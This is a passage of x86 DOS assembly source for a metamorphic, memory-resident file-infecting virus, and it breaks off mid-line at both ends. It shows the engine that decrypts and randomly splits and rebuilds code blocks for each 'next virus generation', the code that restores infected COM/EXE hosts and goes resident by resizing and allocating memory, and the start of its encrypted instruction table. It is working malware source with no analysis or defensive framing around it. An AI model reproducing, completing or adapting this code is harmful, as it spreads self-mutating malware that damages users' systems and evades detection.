zero? Jump to exam_block__ + nop + nop + nop + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_block__ +exam_block__: + push ax ; Save AX at stack + call decrypt_byte + dec si ; Decrease offset of block within ... + cmp al,11101111b ; End of block? + pop ax ; Load AX from stack + jne exam_bloc ; Not equal? Jump to exam_bloc + nop + nop + nop + + cmp di,ax ; End of table of blocks? + jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo + nop + nop + nop + + jmp exam_tbl_inf +exam_bloc: + mov ax,es:[di+02h] ; AX = block information + + cmp ax,0ffffh ; Block is still in one part? + je exam_bloc_ ; Equal? Jump to exam_bloc_ + nop + nop + nop + + push di ; Save DI at stack + mov di,ax ; DI = offset of end of first part... + mov al,11101001b ; JMP imm16 (opcode 0e9h) + stosb ; Store JMP imm16 + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + sub ax,di ; Subtract offset of end of first ... + stosw ; Store 16-bit immediate + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_bloc_: + call decrypt_byte + + cmp al,11101111b ; End of block? + jne exam_bloc__ ; Not equal? Jump to exam_bloc__ + + jmp end_of_block +exam_bloc__: + cmp al,10h ; Data; CALL; JMP; Data reference...? + ja exam_bloc___ ; Above? Jump to exam_bloc___ + nop + nop + nop + + push ax bp ; Save registers at stack + mov bp,[bp+probability] ; BP = probability + call rnd_in_range + or ax,ax ; Split up block? + pop bp ax ; Load registers from stack + jz split_block ; Zero? Jump to split_block + nop + nop + nop + + jmp exam_bloc___ +exam_bloc___: + cmp al,11101111b ; End of block? + jne exam_blo ; Not equal? Jump to exam_blo + + jmp end_of_block +exam_blo: + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_data ; Above or equal? Jump to exam_data + nop + nop + nop + + cmp al,10h ; Data? + jbe sto_instruct ; Below or equal? Jump to sto_inst... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp sto_instruct +sto_instruct: + xor cx,cx ; Zero CX + mov cl,al ; CL = length of instruction + + push di ; Save DI at stack + mov di,bx ; DI = offset within next virus ge... + + jmp sto_ins_loop +sto_ins_loop: + call decrypt_byte + stosb ; Store byte of instruction + + dec cx ; Decrease counter + jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop + nop + nop + nop + + mov bx,di ; BX = offset within next virus ge... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_data: + cmp al,11101101b ; Data reference? + jne exam_blo_ ; Not equal? Jump to exam_blo_ + nop + nop + nop + + push di ; Load DI from stack + mov di,es:[08h] ; DI = offset within data information + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[08h],di ; Store offset within data informa... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_blo_: + cmp al,11101110b ; Beginning of block? + jne sto_call_jmp ; Not equal? Jump to sto_call_jmp + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[04h] ; DI = offset within block informa... + + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[04h],di ; Store offset within block inform... + + cmp ax,4c5h ; Block identification of tmc_table_? + jne exam_message ; Not equal? Jump to exam_message + nop + nop + nop + + push si ; Save SI at stack + mov di,bx ; DI = offset within next virus ge... + lea si,[bp+tmc_table] ; SI = offset of tmc_table + mov cx,(table_end-table_begin) + rep movsb ; Move table to top of memory + + mov bx,di ; BX = offset within next virus ge... + pop si ; Load SI from stack + + jmp examine_next +exam_message: + cmp ax,2328h ; Block identification of message? + jne exam_probabi ; Not equal? Jump to exam_probabi + nop + nop + nop + + mov ax,14h ; Probability of including message + cmp [bp+probability],ax ; Include message? + jae examine_next ; Above or equal? Jump to examine_... + nop + nop + nop + + call decrypt_byte + sub al,10h ; AL = length of message + mov ah,00h ; Zero AH + add si,ax ; SI = offset of end of message + + jmp examine_next +exam_probabi: + cmp ax,0bech ; Block identification of probabi...? + jne examine_next ; Not equal? Jump to examine_next + nop + nop + nop + + mov ax,[bp+probability] ; AX = probability + dec ax ; Decrease probability + cmp ax,05h ; Probability too small? + jae store_probab ; Above or equal? Jump to store_pr... + nop + nop + nop + + mov ax,64h ; Reset probability + + jmp store_probab +store_probab: + mov es:[bx],ax ; Store probability + + add bx,02h ; Add two to offset within next vi... + add si,03h ; SI = offset of beginning of next... + + jmp examine_next +examine_next: + pop di ; Load DI from stack + + call decrypt_byte + + jmp exam_bloc___ +sto_call_jmp: + push ax di ; Save registers at stack + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[06h],di ; Store offset within CALL; JMP; J... + pop di ax ; Load registers from stack + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + add bx,03h ; Add three to offset within next ... + + cmp al,11110000b ; Jump condition? + jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 + + jmp exam_bloc_ +jcc_imm8: + inc bx ; Increase offset within next viru... + inc bx ; Increase offset within next viru... + + jmp exam_bloc_ +split_block_: + mov es:[di+02h],bx ; Store offset within next virus g... + + add bx,03h ; Add three to offset within next ... + + jmp end_of_block +end_of_block: + dec si ; Decrease offset of block within ... + + mov es:[di],si ; Store offset of block within table + + jmp split_block +exam_tbl_inf: + cmp word ptr es:[0ch],00h + jne correct_i16 ; End of second table? Jump to cor... + nop + nop + nop + + pop si ; Load SI from stack + + mov es:[0ch],bx ; Store offset within next virus g... + + add si,(second_table-first_table) + + jmp initial_tmc +correct_i16: + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + sub bx,730h ; Subtract offset of next virus ge... + mov ds:[0eh],bx ; Store length of virus + + mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + shr cx,01h ; Divide number of CALL imm16; JMP... + shr cx,01h ; Divide number of CALL imm16; JMP... + + jmp jmp_call_loo +jmp_call_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,118h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block +find_block: + cmp ax,[si+02h] ; Found block? + je found_block ; Equal? Jump to found_block + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block ; Not zero? Jump to find_block + nop + nop + nop +found_block: + mov dx,[si] ; DX = offset of block + + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + mov al,[bx] ; AL = first byte of instruction + cmp al,11110000b ; Jump condition? + jb sto_call_jm ; Below? Jump to sto_call_jm + nop + nop + nop + + sub byte ptr [bx],10000000b + + inc bx ; BX = offset of 8-bit immediate + + push dx ; Save DX at stack + sub dx,bx ; Subtract offset within next viru... + dec dx ; Decrease 8-bit immediate + + cmp dx,7fh ; 8-bit immediate out of range? + jg invert_jcc ; Greater? Jump to invert_jcc + nop + nop + nop + + cmp dx,0ff80h ; 8-bit immediate out of range? + jl invert_jcc ; Less? Jump to invert_jcc + nop + nop + nop + + mov [bx],dl ; Store 8-bit immediate + inc bx ; BX = offset of end of Jcc imm8 + + mov [bx],1001000010010000b + mov byte ptr [bx+02h],10010000b + pop dx ; Load DX from stack + + jmp correct_i16_ +invert_jcc: + pop dx ; Load DX from stack + + dec bx ; BX = offset of Jcc imm8 + xor byte ptr [bx],00000001b + + inc bx ; BX = offset of 8-bit immediate + mov byte ptr [bx],03h ; Store 8-bit immediate + + inc bx ; BX = offset of JMP imm16 + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + jmp sto_call_jm +sto_call_jm: + mov [bx],al ; Store CALL imm16; JMP imm16 + + inc bx ; BX = offset of 16-bit immediate + sub dx,bx ; Subtract offset within next viru... + + dec dx ; Decrease 16-bit immediate + dec dx ; Decrease 16-bit immediate + + mov [bx],dx ; Store 16-bit immediate + + jmp correct_i16_ +correct_i16_: + dec cx ; Decrease counter + jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo + nop + nop + nop + + mov si,5a8h ; SI = offset of data information + mov cx,ds:[08h] ; CX = offset of end of data infor... + sub cx,si ; Subtract offset of data informat... + + shr cx,01h ; Divide number of data references... + shr cx,01h ; Divide number of data references... + + jmp data_ref_loo +data_ref_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,118h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block_ +find_block_: + cmp ax,[si+02h] ; Found block? + je found_block_ ; Equal? Jump to found_block_ + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block_ ; Not zero? Jump to find_block_ + nop + nop + nop +found_block_: + mov ax,[si] ; AX = offset of block + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + sub ax,730h ; Subtract offset of next virus ge... + mov [bx],ax ; Store 16-bit immediate + + dec cx ; Decrease counter + jnz data_ref_loo ; Not zero? Jump to data_ref_loo + nop + nop + nop + + jmp restore_code +restore_code: + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_ip] ; Save initial IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus + + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+incorrect_ip] ; Save incorrect IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+incorr_code] ; SI = offset of incorr_code + + mov ax,cs:[si] ; AX = first two bytes of incorrec... + mov cs:[100h],ax ; Store first two bytes of incorre... + + mov al,cs:[si+02h] ; AL = last byte of incorrect code + mov cs:[100h+02h],al ; Store last byte of incorrect code + + jmp move_virus +move_virus: + xor ax,ax ; Zero AX + mov ds,ax ; DS = segment of DOS communicatio... + + cmp byte ptr ds:[501h],10h + jne move_virus_ ; Already resident? Jump to move_v... + + jmp virus_exit +move_virus_: + mov byte ptr ds:[501h],10h + + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + sub ax,730h ; Subtract offset of next virus ge... + mov [bp+vir_exit_off],ax + + mov cx,ds:[0eh] ; CX = length of virus + mov [bp+virus_length],cx + + mov si,730h ; SI = offset of next virus genera... + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + mov cl,04h ; Divide by paragraphs + shr di,cl ; DI = length of next virus genera... + inc di ; Increase length of next virus ge... + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + sub bx,di ; Subtract length of next virus ge... + + dec bx ; Decrease new size in paragraphs + dec bx ; Decrease new size in paragraphs + + cmp bx,di ; Insufficient memory? + jae resize_mem_ ; Above or equal? Jump to resize_mem_ + + jmp virus_exit +resize_mem_: + mov ah,4ah ; Resize memory block + int 21h + jnc allocat_mem_ ; No error? Jump to allocat_mem_ + + jmp virus_exit +allocat_mem_: + mov bx,di ; BX = number of paragraphs to all... + mov ah,48h ; Allocate memory + int 21h + jc virus_exit ; Error? Jump to virus_exit + nop + nop + nop + + dec ax ; AX = segment of current Memory C... + mov es,ax ; ES = segment of current Memory C... + mov word ptr es:[01h],08h + + inc ax ; AX = segment of PSP for current ... + mov es,ax ; AX = segment of PSP for current ... + + mov cx,[bp+virus_length] + xor si,si ; Zero SI + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + push es ; Save ES at stack + push word ptr [bp+vir_exit_off] + + mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + mov ah,byte ptr [bp+sliding_key] + + retf ; Return far +terminate: + mov ax,4c00h ; Terminate with return code + int 21h + +get_rnd_num proc near ; Get 16-bit random number + push cx ; Save CX at stack + in al,40h ; AL = 8-bit random number + mov ah,al ; AH = 8-bit random number + in al,40h ; AL = 8-bit random number + + xor ax,es:[02h] ; AX = 16-bit random number + + mov cl,ah ; CL = high-order byte of 16-bit r... + rol ax,cl ; AX = 16-bit random number + + mov es:[02h],ax ; Store 16-bit random number + pop cx ; Load CX from stack + + ret ; Return + endp + +rnd_in_range proc near ; Random number within range + or bp,bp ; Zero BP? + jz zero_range ; Zero? Jump to zero_range + nop + nop + nop + + push dx ; Save DX at stack + call get_rnd_num + + xor dx,dx ; Zero DX + div bp ; DX = random number within range + + xchg ax,dx ; AX = random number within range + pop dx ; Load DX from stack + + ret ; Return +zero_range: + xor ax,ax ; AX = random number within range + + ret ; Return + endp + +decrypt_byte proc near ; Decrypt byte of table + mov [bp+ah_],ah ; Store AH + + mov ax,si ; AX = offset within table + sub ax,bp ; Subtract delta offset from offse... + sub ax,offset tmc_table ; Subtract offset of tmc_table fro... + + mul word ptr [bp+sliding_key] + add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + + xor al,[si] ; AL = byte of decrypted table + + mov ah,[bp+ah_] ; AH = stored AH + + inc si ; Increase offset within table + + ret ; Return + endp + +decrypt_id proc near ; Decrypt block identification in ... + call decrypt_byte + mov ah,al ; AL = byte of decrypted table + + call decrypt_byte + xchg al,ah ; AL = byte of decrypted table + + ret ; Return + endp +virus_exit: + pop es ; Load ES from stack + + mov ah,49h ; Free memory + int 21h + pop bx ; Load BX from stack + + pop ax ; Load AX from stack + mov ds,ax ; DS = segment of PSP for current ... + mov es,ax ; DS = segment of PSP for current ... + + mov ah,4ah ; Resize memory block + int 21h + + lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 + + pop ax ; Load AX from stack (initial IP) + mov cs:[bx+01h],ax ; Store initial IP + + pop ax ; Load AX from stack (initial CS ...) + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + pop ax ; Load AX from stack (initial SP) + pop ss ; Load SS from stack (initial SS ...) + + mov sp,ax ; SP = stack pointer + + jmp jmp_imm32 + +jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory +ah_ db 00h ; Accumulator register (high-orde...) +probability dw 32h ; Probability +crypt_key db 00h ; 8-bit encryption/decryption key +sliding_key dw 00h ; 8-bit sliding encryption/decrypt... +executa_stat db 00h ; Executable status +origin_code db 11000011b,02h dup(00h) +incorr_code db 11000011b,02h dup(00h) +initial_cs dw 0fff0h ; Initial CS relative to start of ... +initial_ss dw 0fff0h ; Initial SS relative to start of ... +initial_ip dw 100h ; Initial IP +incorrect_ip dw 100h ; Incorrect IP +initial_sp dw 0fffeh ; Initial SP +new_mcb_size dw 1000h ; New size in paragraphs +mcb_size dw 0ffffh ; Size of memory block in paragraphs +mcb_size_ dw 00h ; Size of memory block in paragraphs +program_seg dw 00h ; Segment of PSP for current process +virus_length dw 00h ; Length of virus +vir_exit_off dw 00h ; Offset of virus_exit +table_begin: +first_table: +tmc_table db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 00h ; Block identification of tmc_table + db 04h ; Four bytes instruction + + db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) + dw 1234h ; Delta offset + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 02h ; Two bytes instruction + + mov ax,ds ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store segment of PSP for current... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of current Memory C... + + db 03h ; Three bytes instruction + + mov ax,ds:[03h] ; AX = size of memory block in par... + + db 03h ; Three bytes instruction + + cmp ax,1900h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store size of memory block in p... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 01h ; One byte instruction + + dec bx ; BX = number of paragraphs to all... + + db 04h ; Four bytes instruction + + cmp bx,267h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of allocated memory + + db 07h ; Seven bytes instruction + + add es:[02h],6942h ; Store 16-bit random number + + db 07h ; Seven bytes instruction + + mov word ptr es:[0ch],00h + + db 07h ; Seven bytes instruction + + mov es:[04h],118h ; Store offset of block information + + db 07h ; Seven bytes instruction + + mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... + + db 07h ; Seven bytes instruction + + mov es:[08h],5a8h ; Store offset of data information + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov bx,730h ; BX = offset of next virus genera... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +initial_tmc_ db 11101110b ; Beginning of block + dw 0fa0h ; Block identification of initial_... + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +tmc_ini_loo db 11101110b ; Beginning of block + dw 0bb8h ; Block identification of tmc_ini_loo + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of block or instruct... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + or al,al ; End of table? + + db 01110100b+10000000b ; Zero? Jump to calc_blocks_ + dw 0bbch ; Pointer to calc_blocks_ + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ + dw 0bb9h ; Pointer to exam_blo__ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... + dw 0bb8h ; Pointer to tmc_ini_loo + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo__ db 11101110b ; Beginning of block + dw 0bb9h ; Block identification of exam_blo__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110101b+10000000b ; Not equal? Jump to exam_blo___ + dw 0bbah ; Pointer to exam_blo___ + db 02h ; Two bytes instruction + + mov al,00h ; Don't add anything to offset wit... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo___ db 11101110b ; Beginning of block + dw 0bbah ; Block identification of exam_blo___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? Jump to next_byte_ + dw 0bbbh ; Pointer to next_byte_ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset of block identification + + db 01h ; One byte instruction + + dec ax ; AX = offset of block within table + + db 01h ; One byte instruction + + stosw ; Store offset of block within table + + db 03h ; Three bytes instruction + + mov ax,0ffffh ; Block is still in one part + + db 01h ; One byte instruction + + stosw ; Store block identification + + db 03h ; Three bytes instruction + + mov ax,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +next_byte_ db 11101110b ; Beginning of block + dw 0bbbh ; Block identification of next_byte_ + db 02h ; Two bytes instruction + + mov al,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +calc_blocks_ db 11101110b ; Beginning of block + dw 0bbch ; Block identification of calc_blo... + db 03h ; Three bytes instruction + + lea ax,[di-10h] ; AX = number of blocks multiplied... + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 04h ; Four bytes instruction + + mov es:[0ah],ax ; Store number of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; End of table + + db 01h ; One byte instruction + + stosw ; Store end of table + + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc0h ; Pointer to exam_bl + db 11101111b ; End of block +split_bloc db 11101110b ; Beginning of block + dw 0bbdh ; Block identification of split_bloc + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 05h ; Five bytes instruction + + mov bp,es:[0ah] ; BP = number of blocks + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 03h ; Three bytes instruction + + add ax,10h ; Add ten to random number + + db 02h ; Two bytes instruction + + mov di,ax ; DI = random offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101111b ; End of block +exam_nxt_bl_ db 11101110b ; Beginning of block + dw 0bbeh ; Block identification of exam_nxt... + db 03h ; Three bytes instruction + + add di,04h ; DI = offset of next offset withi... + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of next block within... + + db 02h ; Two bytes instruction + + or si,si ; End of table? + + db 01110101b+10000000b ; Not zero? Jump to exam_blo____ + dw 0bbfh ; Pointer to exam_blo____ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbfh ; Pointer to exam_blo____ + db 11101111b ; End of block +exam_blo____ db 11101110b ; Beginning of block + dw 0bbfh ; Block identification of exam_blo... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to exam_bl + dw 0bc0h ; Pointer to exam_bl + db 02h ; Two bytes instruction + + cmp di,ax ; End of table of blocks? + + db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcah ; Pointer to exam_tbl_in + db 11101111b ; End of block +exam_bl db 11101110b ; Beginning of block + dw 0bc0h ; Block identification of exam_bl + db 04h ; Four bytes instruction + + mov ax,es:[di+02h] ; AX = block information + + db 03h ; Three bytes instruction + + cmp ax,0ffffh ; Block is still in one part? + + db 01110100b+10000000b ; Equal? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,ax ; DI = offset of end of first part... + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 01h ; One byte instruction + + stosb ; Store JMP imm16 + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 02h ; Two bytes instruction + + sub ax,di ; Subtract offset of end of first ... + + db 01h ; One byte instruction + + stosw ; Store 16-bit immediate + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl_ db 11101110b ; Beginning of block + dw 0bc1h ; Block identification of exam_bl_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,10h ; Data; CALL; JMP; Data reference...? + + db 01110111b+10000000b ; Above? Jump to exam_bl__ + dw 0bc2h ; Pointer to exam_bl__ + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 04h ; Four bytes instruction + + mov bp,[bp+1234h] ; BP = probability + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 02h ; Two bytes instruction + + or ax,ax ; Split up block? + + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110100b+10000000b ; Zero? Jump to split_bloc_ + dw 0bc8h ; Pointer to split_bloc_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +exam_bl__ db 11101110b ; Beginning of block + dw 0bc2h ; Block identification of exam_bl__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? Jump to exam_data_ + dw 0bc4h ; Pointer to exam_data_ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to sto_instruc + dw 0bc3h ; Pointer to sto_instruc + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc3h ; Pointer to sto_instruc + db 11101111b ; End of block +sto_instruc db 11101110b ; Beginning of block + dw 0bc3h ; Block identification of sto_instruc + db 02h ; Two bytes instruction + + xor cx,cx ; Zero CX + + db 02h ; Two bytes instruction + + mov cl,al ; CL = length of instruction + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0beah ; Pointer to sto_ins_loo + db 11101111b ; End of block +sto_ins_loo db 11101110b ; Beginning of block + dw 0beah ; Block identification of sto_ins_loo + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + stosb ; Store byte of instruction + + db 01h ; One byte 